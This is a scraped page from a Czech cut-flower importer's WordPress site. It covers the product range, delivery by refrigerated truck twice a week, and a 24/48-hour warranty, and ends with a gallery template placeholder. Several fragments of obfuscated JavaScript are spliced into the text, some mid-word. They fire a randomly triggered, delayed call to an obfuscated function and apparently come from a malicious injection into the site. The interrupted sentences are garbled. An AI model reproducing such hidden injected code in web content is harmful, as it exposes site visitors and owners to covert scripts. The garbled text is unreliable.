ŘEZANÉ A HRNKOVÉ KVĚTINY

Dovážíme široký sortiment řezaných a hrnkových  květin  převážně z Holdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andska.
Čerstvé zboží zavážíme minimálně dvakrát týdně a to v úterý a čtvrtek prostřednictvím thermo kamiónů tak, aby  květiny byly dopraveny do České republiky co nejšetrněji a ve výborné kvalitě.

REKLAMACE

Pokojové rostliny jsou obdobně jako květiny řezané zařazeny ve třídě zboží, které podléhá zkáze, a proto se na ně ve smyslu ustanovení §619 odst. 2 občanského zákoníku nevztahuje zákonná časově ohraničená záruční doba.
Záruka na řezané květiny je 24 hodindom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}  a u hrnkových rostlin 48 hodindom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}  při správné péči o ně. Na pozdější reklamace nebude brán zřetel.

VAZBA KVĚTIN ZRUŠENA !!!!

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

Default Gallery Type Template

This is the default gallery type template, located in:
/srv/cutflowers.cz/www/web/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/templates/index.php.

If you're seeing this, it's because the gallery type you selected has not provided a template of it's own.